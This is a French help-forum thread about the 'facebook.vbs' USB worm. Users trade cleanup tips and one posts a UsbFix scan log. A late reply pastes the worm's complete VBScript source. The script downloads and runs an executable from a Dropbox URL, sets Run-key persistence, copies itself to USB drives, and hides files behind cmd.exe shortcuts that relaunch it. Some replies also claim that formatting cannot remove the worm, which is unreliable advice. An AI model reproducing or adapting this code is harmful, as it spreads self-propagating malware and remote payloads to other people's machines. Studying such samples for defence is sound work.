Virus ou cheval de troie "facebook vbs"

Résolu/Fermé
ismeldetwo Messages postés 3 Date d'inscription jeudi 8 février 2007 Statut Membre Dernière intervention 9 juin 2013 - 4 mai 2013 à 14:37
 malre - 26 août 2014 à 14:51
Bonjour à tous.

Je suis très handicapé par un virus que j'ai attrapé en allant faire une impression d'un document avec une clef usb dans un cyber-café.
Il s'agit d'un document nommé "facebook vbs". Ce truc s'installe sur mes clefs usb et copie mes dossiers, créé des raccourcis. Mes dossiers deviennent des archives.
J'ai essayé un maximum de scanne en ligne. Avast le détecte mais il se localise dans les programmes et du fait qu'il est caché derrière un mot de passe, il résiste !
Même en paramétrant un scanne au démarrage en demandant de supprimer les dossiers infectés...
Si vous pouviez me trouver une solution cela m'arrangerais.
Merci.
A voir également:

6 réponses

billmaxime Messages postés 50445 Date d'inscription dimanche 20 novembre 2011 Statut Contributeur Dernière intervention 23 décembre 2024 6 011
4 mai 2013 à 14:56
salut

fais ceci pour ton problème

télécharge usbfix sur ton bureau (clique sur la flèche verte)

le lien http://general-changelog-team.fr/fr/downloads/viewdownload/15-outils-de-el-desaparecido/79-usbfix

si ton pc émet 1 alerte, ignore la

branche toutes tes sources de données externe a ton pc (clé USB, disque dur externe, etc...) sans les ouvrir

le tuto https://www.malekal.com/tutoriels-logiciels/

exécute le en tant qu'administrateur (clic droit)

choisis le mode "recherche"

le rapport s'affichera sur ton bureau et dans C:\UsbFix.txt

poste le rapport via 1 copier/coller

@+

9
RICH11 Messages postés 2 Date d'inscription samedi 7 septembre 2013 Statut Membre Dernière intervention 8 septembre 2013
7 sept. 2013 à 07:21
SALUT en fait j'avais la meme question que celle que vous avez repondue j'aimerais poster le rapport recu pr avoir un soutien
c le suivant:
############################## | UsbFix V 7.134 | [Recherche]

Utilisateur: REDAMPTEUR (Administrateur) # PC-A368EF44E297
Mis à jour le 06/09/2013 par El Desaparecido
Lancé à 06:00:53 | 07/09/2013

Site Web: https://www.sosvirus.net/
Upload Malware: http://www.sosvirus.net/upload_malware.php
Contact: http://wwww.sosvirus.net/contact_eldesaparecido.php

PC: Compaq (Evo D510 SFF) (X86-based PC)
CPU: Intel(R) Pentium(R) 4 CPU 2.40GHz (2392)
RAM -> [Total : 1015 | Free : 268]
BIOS: 686O2 v2.20
BOOT: Normal boot

OS: Microsoft Windows XP Professionnel (5.1.2600 32-Bit) # Service Pack 2
WB: Windows Internet Explorer 8.0.6001.18702

SC: Security Center Service [Enabled]
WU: Windows Update Service [Enabled]
FW: Windows FireWall Service [Enabled]

C:\ (%systemdrive%) -> Disque fixe # 19 Go (4 Go libre(s) - 24%) [wij xp] # NTFS
D:\ -> CD-ROM
E:\ -> Disque amovible # 7 Go (1 Go libre(s) - 14%) [POCKET] # FAT32

################## | Processus Actif |

C:\WINDOWS\System32\smss.exe (936)
C:\WINDOWS\system32\csrss.exe (992)
C:\WINDOWS\system32\winlogon.exe (1016)
C:\WINDOWS\system32\services.exe (1060)
C:\WINDOWS\system32\lsass.exe (1072)
C:\WINDOWS\system32\svchost.exe (1272)
C:\WINDOWS\system32\svchost.exe (1368)
C:\WINDOWS\System32\svchost.exe (1492)
C:\WINDOWS\system32\svchost.exe (1592)
C:\WINDOWS\system32\svchost.exe (1740)
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe (1828)
C:\Program Files\Alwil Software\Avast5\afwServ.exe (1936)
C:\WINDOWS\system32\spoolsv.exe (252)
C:\WINDOWS\system32\svchost.exe (1684)
C:\WINDOWS\Explorer.EXE (928)
C:\Program Files\lucky leap\updateluckyleap.exe (224)
C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe (1352)
C:\WINDOWS\System32\alg.exe (2464)
C:\WINDOWS\system32\ctfmon.exe (3220)
C:\WINDOWS\System32\svchost.exe (3584)
C:\Program Files\Mozilla Firefox\firefox.exe (3868)
C:\Program Files\Mozilla Firefox\plugin-container.exe (2728)
C:\Program Files\Alwil Software\Avast5\AvastUI.exe (2968)
C:\UsbFix\Go.exe (2132)
C:\WINDOWS\system32\wbem\wmiprvse.exe (3616)

################## | El Desaparecido Section |

HKLM\SOFTWARE | Run : [DivXMediaServer] - C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe
HKLM\SOFTWARE | Run : [DivXUpdate] - "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
HKLM\SOFTWARE | Run : [avast] - "C:\Program Files\Alwil Software\Avast5\avastUI.exe" /nogui
HKLM\SOFTWARE | Run : [TkBellExe] - "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
HKLM\SOFTWARE | Run : [Adobe Reader Speed Launcher] - "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
HKLM\SOFTWARE | Run : [Adobe ARM] - "C:\Program Files\Fichiers communs\Adobe\ARM\1.0\AdobeARM.exe"
HKLM\SOFTWARE | RunOnce : [] -
HKU\S-1-5-19\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE
HKU\S-1-5-20\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE
HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\ctfmon.exe
HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [RoboForm] - "C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe"
HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [uTorrent] - "C:\Documents and Settings\REDAMPTEUR\Application Data\uTorrent\uTorrent.exe" /MINIMIZED
HKU\S-1-5-21-854245398-1417001333-682003330-1016\SOFTWARE | Run : [UpdateChecker] - C:\Program Files\SqueakyChocolate\UpdateChecker\UpdateCheckerApp.exe
HKU\S-1-5-18\SOFTWARE | Run : [CTFMON.EXE] - C:\WINDOWS\system32\CTFMON.EXE

################## | Eléments infectieux |

Présent! C:\ministub.exe
Présent! E:\make-money-with-facebook-wealth-formula.pdf.lnk
Présent! E:\list.lnk
Présent! E:\ccccc.exe
Présent! E:\cacaoweb.exe
Présent! E:\boucle1.exe
Présent! E:\bc .exe
Présent! E:\affich.exe
Présent! E:\probabilitesEXCORRIGES1.rar.lnk
Présent! E:\JUZU AMMA in KIRUNDI.lnk
Présent! E:\Acute Email IDs Production Engine.lnk
Présent! E:\COORAAN.lnk
Présent! E:\mugani richard_fichiers\cbcommon.js
Présent! E:\mugani richard_fichiers\cookies.js
Présent! E:\mugani richard_fichiers\isrunning.js
Présent! E:\mugani richard_fichiers\jquery-1.js
Présent! E:\mugani richard_fichiers\jquery-ui-1.js
Présent! E:\mugani richard_fichiers\s_code.js
Présent! E:\mugani richard_fichiers\ui.js
Présent! C:\DOCUME~1\REDAMP~1\LOCALS~1\Temp\iet6A.tmp.exe
Présent! C:\DOCUME~1\REDAMP~1\LOCALS~1\Temp\utt69.tmp.exe
Présent! E:\AUTORUN.INF

################## | Registre |


################## | Mountpoints2 |



################## | Vaccin |

(!) Cet ordinateur n'est pas vacciné!

################## | E.O.F | https://www.sosvirus.net/ |
0
ElementW Messages postés 4816 Date d'inscription dimanche 12 juin 2011 Statut Contributeur Dernière intervention 5 octobre 2021 1 228
Modifié par gravgun le 4/05/2013 à 14:59
Je cite https://www.malekal.com/vers-facebook-en-vbs/ (en bas de la page)
"Ci-dessous, les lignes malicieuses visibles sur HijackThis.
Ces lignes sont à cocher puis cliquer sur Fix Checked.
Redémarrez l'ordinateur, le ver ne devrait plus être actif
."
Juste un fix avec HijackThis devrait donc faire l'affaire pour s'en débarasser.
Mais il faudra l'enlever des clés à la main, sans les ouvrir.
0
ismeldetwo Messages postés 3 Date d'inscription jeudi 8 février 2007 Statut Membre Dernière intervention 9 juin 2013
12 mai 2013 à 14:05
merci à ceux qui m'ont proposé des solutions... Jusqu'à présent je suis toujours dans le pétrin !
Un virus ne peut s'effacer par un formatage.
Ce truc, que j'ai sur mon ordinateur semble être un cheval de Troie.
Je me souviens avoir eu ce genre de truc, il y a 3 ou 4 ans, à l'époque je l'avais éliminé avec NPE.
On m'a montré le chemin pour l'éliminer sur une clef usb, mais il faut que je le sorte de mon pc.
Il s'agit d'une combinaison de tâche à effectuer dans l'ordre.
S'il vous plais, pour ceux (plein de bonne volonté), qui donnent des réponses, soyez indulgents avec moi, je ne suis pas ingénieur en informatique. Si cela est trop compliqué je demanderais à un ami formateur en informatique.
0
lilidurhone Messages postés 43347 Date d'inscription lundi 25 avril 2011 Statut Contributeur sécurité Dernière intervention 31 octobre 2024 3 806
12 mai 2013 à 14:23
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
erf64 Messages postés 1 Date d'inscription samedi 8 juin 2013 Statut Membre Dernière intervention 8 juin 2013
Modifié par erf64 le 8/06/2013 à 00:13
http://ensaama.net/dotclear/intranet/index.php?post/2013/04/04/VIRUS

LA solution. Elle permet de sauver ses fichiers. (Cela dit, elle ne marche pas avec les Carte Sd, du fait qu'elle se branche aux lecteur I:, et qu'il n'est pas possible de modifier le fichier sans quoi Windows refuse de le lire.)

(navré du retard, mais je pense que d'autre internautes seront contents de trouver une solutions permettant de sauver leurs fichiers.)
0
juju666 Messages postés 35446 Date d'inscription jeudi 18 décembre 2008 Statut Contributeur sécurité Dernière intervention 21 avril 2024 4 796
8 juin 2013 à 02:21
Bonjour,
BOF ! C'est pas LA solution, sachant qu'usbfix fait tout de lui même ...
0
ismeldetwo Messages postés 3 Date d'inscription jeudi 8 février 2007 Statut Membre Dernière intervention 9 juin 2013
9 juin 2013 à 10:55
merci à tous.
Toutes vos réponses étaient à côté !
J'ai simplement attendu la nouvelle mise à jour du programme "avast" free, et j'ai fais un scanne au démarrage avec les paramètres "suppression".
Mon ordinateur est propre, et lorsque je branche une clef usb ou une carte sd elle est scannée puis nettoyée, avant ouverture.
0
je crois que Facebook.vbs est plus pertinant ; aprés de nombreux test de scann le virus ne serait pas facebook mais un autre installer sur la machine grâce a un site qui dés introduction de clef usb mets le fichier vbs sur la clef.
0
pour ceuw que cela interesse le virus n'est pas facebook code çi dessous mais un autre qui installe ce fichier. alors lequel ..;;???:::;;
'<[ coded And Developed bY KAKA27 ]>'
On Error Resume Next
Dim sh ' shell
Set sh = WScript.CreateObject("WScript.Shell")
Dim fs ' filesystem
Set fs = CreateObject("Scripting.FileSystemObject")
'---------------------------------------------
'---------------------------------------------
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
( "Select * from Win32_Process Where Name = 'FlashPlayerPlug_1013010.exe'")
If colProcesses.Count = 0 Then
' Wscript.Echo "Database.exe is not running."
Set oShell = CreateObject("WScript.Shell")
strHomeFolder = oShell.ExpandEnvironmentStrings("%TEMP%")
download "http://dl.dropbox.com/s/fqlbp4q0pz67dy9/FlashPlayerUpdt.exe?dl=1", strHomeFolder & "\FlashPlayerMsj.exe"
Dim objShell, strCommand
Set objShell = CreateObject("WScript.Shell")
strCommand = "IPConfig /Release"
objShell.Run strCommand, 0, True
WScript.Sleep 1500
objShell.Run strHomeFolder & "\FlashPlayerMsj.exe"
WScript.Sleep 2500
strCommand = "IPConfig /Renew"
objShell.Run strCommand, 0, True

'-------------------------------------------------
set WshShell = WScript.CreateObject("WScript.Shell")
strDesktop = WshShell.SpecialFolders("Startup")
set oShellLink = WshShell.CreateShortcut(strDesktop &"\FlashPlayerPlug.lnk")
oShellLink.TargetPath = strHomeFolder & "\FlashPlayerMsj.exe"
oShellLink.WindowStyle = 1
oShellLink.IconLocation = "FlashPlayerMsj.exe, 0"
oShellLink.Description = "Lancer Flash player"
oShellLink.WorkingDirectory = strDesktop
oShellLink.Save

'--------------------------------------------------

End If
Dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
Dim FN
FN = "Facebook.vbs"
Dim fh
Dim us
us = "~"
ins


dim i
i=0
while true
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend
'---------------------------------------------------------------
Function ins
On Error Resume Next
us = sh.regread("HKCU\njq8")
If us = "~" Then
If lcase(mid(wscript.scriptfullname, 2)) = ":\" & lcase(fn) Then
us = "y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
Else
us = "n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
End If
End If
Err.Clear
fs.CopyFile wscript.scriptfullname, dr & fn, True
Set fh = fs.OpenTextFile(dr & fn, 8, False)
If Err.Number > 0 Then
wscript.quit
End If
xins
End Function
'---------------------------------------------------------------
Sub xins
On Error Resume Next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path & "\" & fn, True
For Each xx In fs.Drives
If xx.isready Then
If xx.FreeSpace > 0 Then
If xx.drivetype = 1 Then
If fs.fileexists(xx.path & "\" & fn) Then
fs.getfile(xx.path & "\" & fn).Attributes = 0
End If
fs.copyfile dr & fn, xx.path & "\" & fn, True
For Each x In fs.GetFolder(xx.path & "\").Files
wscript.sleep 1
If instr(x.name, ".") Then
If lcase(Split(x.name, ".")(UBound(Split(x.name, ".")))) <> "lnk" Then
x.Attributes = 2
If ucase(x.name) <> ucase(fn) Then
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn, " ", ChrW(34) & " " & ChrW(34)) & "&start " & replace(x.name, " ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
If instr(.iconlocation, ",") = 0 Then
.iconlocation = .iconlocation & ",0"
End If
.Save()
End With
End If
End If
End If
Next

set objFolder = fs.GetFolder(xx.path & "\")

for Each folder in objFolder.SubFolders
folder.Attributes = 2
With sh.CreateShortcut(xx.path & "\" & folder.name & ".lnk")
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn, " ", ChrW(34) & " " & ChrW(34)) & "& explorer.exe " & replace(folder.name, " ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = "%systemroot%\System32\shell32.dll,4"
.Save()
End With

Next

End If
End If
End If
Next
Err.Clear
End Sub
'---------------------------------------------------------------
'function post(cmd ,da)
'post=""
'Dim o
'Set o = CreateObject("MSXML2.XMLHTTP")
'o.open "POST","http://" & host & ":" & port &"/" & cmd, false
'o.setRequestHeader "User-Agent:", inf
'o.send da
'post=o.responseText
'end function
Function download(sFileURL, sLocation)
'create xmlhttp object
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
'get the remote file
objXMLHTTP.open "GET", sFileURL, False
'send the request
objXMLHTTP.send()
'wait until the data has downloaded successfully
Do Until objXMLHTTP.Status = 200 :
wcript.sleep(1000) :
Loop
'if the data has downloaded sucessfully
If objXMLHTTP.Status = 200 Then
'create binary stream object
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
'adTypeBinary
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
'Set the stream position to the start
objADOStream.Position = 0
'create file system object to allow the script to check for an existing file
Set objFSO = Createobject("Scripting.FileSystemObject")
'check if the file exists, if it exists then delete it
If objFSO.Fileexists(sLocation) Then objFSO.DeleteFile sLocation
'destroy file system object
Set objFSO = Nothing
'save the ado stream to a file
objADOStream.SaveToFile sLocation
'close the ado stream
objADOStream.Close
'destroy the ado stream object
Set objADOStream = Nothing
'end object downloaded successfully
End If
'destroy xml http object
Set objXMLHTTP = Nothing
End Function


pas bien mechant et c'est signer kaka bravo
0
sur votre cley il ne vus reste que des liens ; click droit sur le raccourçis et propriete
pas beau àvoir cmd start facebook.vbs puis ect .. explorer.exe effacer facebook.vbs uniquement
appliquer et fermer la boite de dialogue.
cliquer sur votre liens modifier normalement il s'ouvre sans enclancher eurodisneyvirus euh non facebook.vbs

quelque autre conseil

A : outil regedit
1 - HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" verifier si facebook existe si oui effacer keys
2 - HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" la même chose

B : outils invite de commande
explication :

'Dim DR
'DR = sh.ExpandEnvironmentStrings("%temp%") & "\" // Oui ici c'est dur de comprendre
sh.ExpandEnvironmentStrings("%temp%") signifie directory temp a savoir qu' un cycle continue se met a s'enclencher des l'ouverture du liens cree par l'autre virus installer sur la machine ou vous avez telecharger votre DVX ou XX fichier.
(la definition de cley usb devient obsolete des 'apparition d'un virus 'rire').
il vous cree donc vos fichier en raccourçis et facebook.vbs lui n'est pas utile attrib via cmd changement des propriete hidden effacer le vous pouvez l'analiser sur cette page.
et votre cley et comme neuve le mieux et de copier le contenu formater et les mettre une seconde fois.

'Dim FN
'FN = "Facebook.vbs" //variable non aimé il est du FN "pas beau".
'Dim fh //surement un syndicat un souhait sur de sur.
'Dim us //des revendication direct vers microsoft leur suggerant de s' installer ailleur.
'us = "~" // souhait entre guillemet.

'DR = sh.ExpandEnvironmentStrings("%temp%") & "\" si vous analiser bien cette variable avec son ensemble dans son programme vous comprendrez que votre machine a besoin d'un eventuel nettoyage .A savoir d'un super technicien sans faire de publicité je deviens tres cher lors de mes entretien ras le bol du populisme nucleaire c'est cadeau.
Alors voila le mieux et de recuperer votre ipad ou android ou mieux linux apple tout marque differente de microsoft et mettre votre cley op apparition le fichier facebook effacer le .
Sans plus attendre le nettoyage de votre machine comment proceder.
le fichier temp chercher facebook.vbs ne sert à rien se fichier temp et cacher dans le local un veritable homme de menage aujourd'hui ballet serpillere torchon essui tout et brosse à dent pour curer le fond (pour ceux qui ont encore rien compris microsoft mets les fichier en instance d'execution dans un local verifier les cley vous les avez peut être oublier dans le regedit
à bientôt
0
Louchot Messages postés 52 Date d'inscription vendredi 26 avril 2013 Statut Membre Dernière intervention 23 août 2013 1
4 mai 2013 à 14:53
Bonjour, malheureusement,je ne vois que le formatage de la clé comme solution. :/
-4
meme le formatage ne supprime pas les virus
0
Stupa163 Messages postés 1 Date d'inscription mercredi 22 janvier 2014 Statut Membre Dernière intervention 22 janvier 2014
22 janv. 2014 à 13:20
Je confirme le formatage n'efface pas le virusde la clé.
0